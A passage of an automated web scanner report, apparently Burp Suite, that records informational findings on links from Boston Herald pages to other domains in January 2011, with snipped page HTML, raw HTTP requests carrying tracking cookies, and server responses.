<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/"><img src="http://cache.heraldinteractive.com/blogs/entertainment/disney_days/wp-content/uploads/2011/01/castaway11111.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-brandon-meriweather-and-darrelle-revis-launch-friendly-fire/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/2010112120101121395900.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/35.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/arts_culture/view.bg?articleid=1312261&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/39b0d8_garden_01272011.jpg" border="0"
width="207" height="181" caption="Forever young" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" alt="Charlie Sheen." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312550&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/bcd2f7_jul_01282011.jpg" border="0"
width="207" height="181" caption="Moore&rsquo;s the merrier at Hasty festivities" />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.2. http://www.bostonherald.com/blogs/sports/rap_sheet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /blogs/sports/rap_sheet/?srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:48:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 115370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/sports.css" media="screen,projection" />

   
   <link rel="stylesheet" type="text/css" href="/CSS/blogsInside.css" media="screen,projection" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/patriots.css" media="screen,projection" />
   
<script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/sports/football/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="90px" width:"200px" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
News &amp; Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
</strong>. <a href="http://bcove.me/6oguf24t"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=767806748001&#038;playerID=84359688001&#038;playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&#038;domain=embed&#038;dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>is more than a football player. He&#8217;s a celebrity, too, selling <a href="http://www.google.com/url?sa=t&amp;source=web&amp;cd=1&amp;ved=0CBMQFjAA&amp;url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2010%2F11%2F30%2Fpatriots-qb-tom-brady-now-endorsing-the-boots-my-wife-wears%2F&amp;rct=j&amp;q=Rap%20Sheet%20BRady%20Uggs&amp;ei=NANDTY_ZOcOB8gaSlu24AQ&amp;usg=AFQjCNFw3KIS_t1eB_Vew-79zoo6yD1CBg&amp;sig2=WBrzzR3H0XX0Q3gXTwFkzQ&amp;cad=rja">everything from the same shoes</a>
...[SNIP]...
<strong><a href="http://www.imageyenation.com/images/blog-gallery/kylie_ugg_boots.jpg">The Banktress</a>
...[SNIP]...
<p>He&#8217;s a pretty powerful athlete. <a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/2">Recently, Business Week Magazine released a list of exactly how powerful</a>
...[SNIP]...
<p><a href="http://images.businessweek.com/slideshows/20110124/power-100-2011/slides/6"><u>
...[SNIP]...
hat&#8217;s where this comes in. Want to see some of the Senior Bowl&#8217;s best pass-rushers battle some of its best offensive linemen? Cool. With my new-and-improved Flip camera, I got you covered. <a href="http://bcove.me/jq9h39r3"><u>
...[SNIP]...
<p><object id="flashObj" width="486" height="412" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0">
<param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="videoId=766823050001&#038;playerID=84359688001&#038;playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9&#038;domain=embed&#038;dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="486" height="412" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
</strong>, the director of football operations of Perennial Sports and Entertainment, <a href="http://twitter.com/#!/RapSheet/statuses/30752231791796225">said as much in a Tweet</a>
...[SNIP]...
<p><a href="http://sports.espn.go.com/ncf/player/profile?playerId=235808">Sanzenbacher shares several characteristics</a>
...[SNIP]...
gn="right" width="256" height="256" />Earlier today, the NFL offices hosted 10 reporters for a meeting breaking down various aspects of the impending labor disasterbacle. Alas, I wasn&#8217;t invited. <a href="http://profootballtalk.nbcsports.com/2011/01/27/nfl-stresses-immediate-consequences-of-possible-lockout/">But Pro Football Talk&#8217;s<strong>
...[SNIP]...
<p>The league, <a href="http://twitter.com/#!/greggrosenthal/statuses/30718247296835584">though people such as NFL chief negotiator <strong>
...[SNIP]...
e="RB senior bowl" alt="RB senior bowl" align="right" width="256" height="129" />Of all the holes the Patriots have looking toward 2011, the spot at running back is kind of undercover. They did have a <a href="http://www.google.com/url?sa=t&amp;source=web&amp;cd=1&amp;ved=0CBcQFjAA&amp;url=http%3A%2F%2Fwww.bostonherald.com%2Fblogs%2Fsports%2Frap_sheet%2Findex.php%2F2011%2F01%2F14%2Fwhy-is-patriots-rb-benjarvus-green-ellis-always-so-positive-and-links%2F&amp;rct=j&amp;q=Rap%20Sheet%20Green-Ellis%20positive%20yards&amp;ei=vXxBTYS6NIPpgQfr08XMAQ&amp;usg=AFQjCNFs93srIrRIMWcjlJNqetsJyngKoA&amp;sig2=dpufrHU-q6YaX7UMvpfX-Q&amp;cad=rja">1,000-yard rusher in<strong>
...[SNIP]...
<font class=bodyFont color=#333333>
   <img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/rap_sheet.gif">
   <div style="position:absolute; top:25px; right:15px">
...[SNIP]...
<a href=http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/feed/><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssGrey11.gif" border=0>RSS Feed</a>
...[SNIP]...
<p>
   <img src="http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg" style="float:left; padding:0 3px 5px 0">
Patriots beat reporter <b>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif" style="float:left; padding:0 3px 5px 0">    
    <b>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/category/discovering-devin/"><img style="border: 1px #666 solid;" src="http://cache.heraldinteractive.com/images/version5.0/site_images/sports/discovering_devin/McCourty_310x100.jpg" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

7.3. http://www.bostonherald.com/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
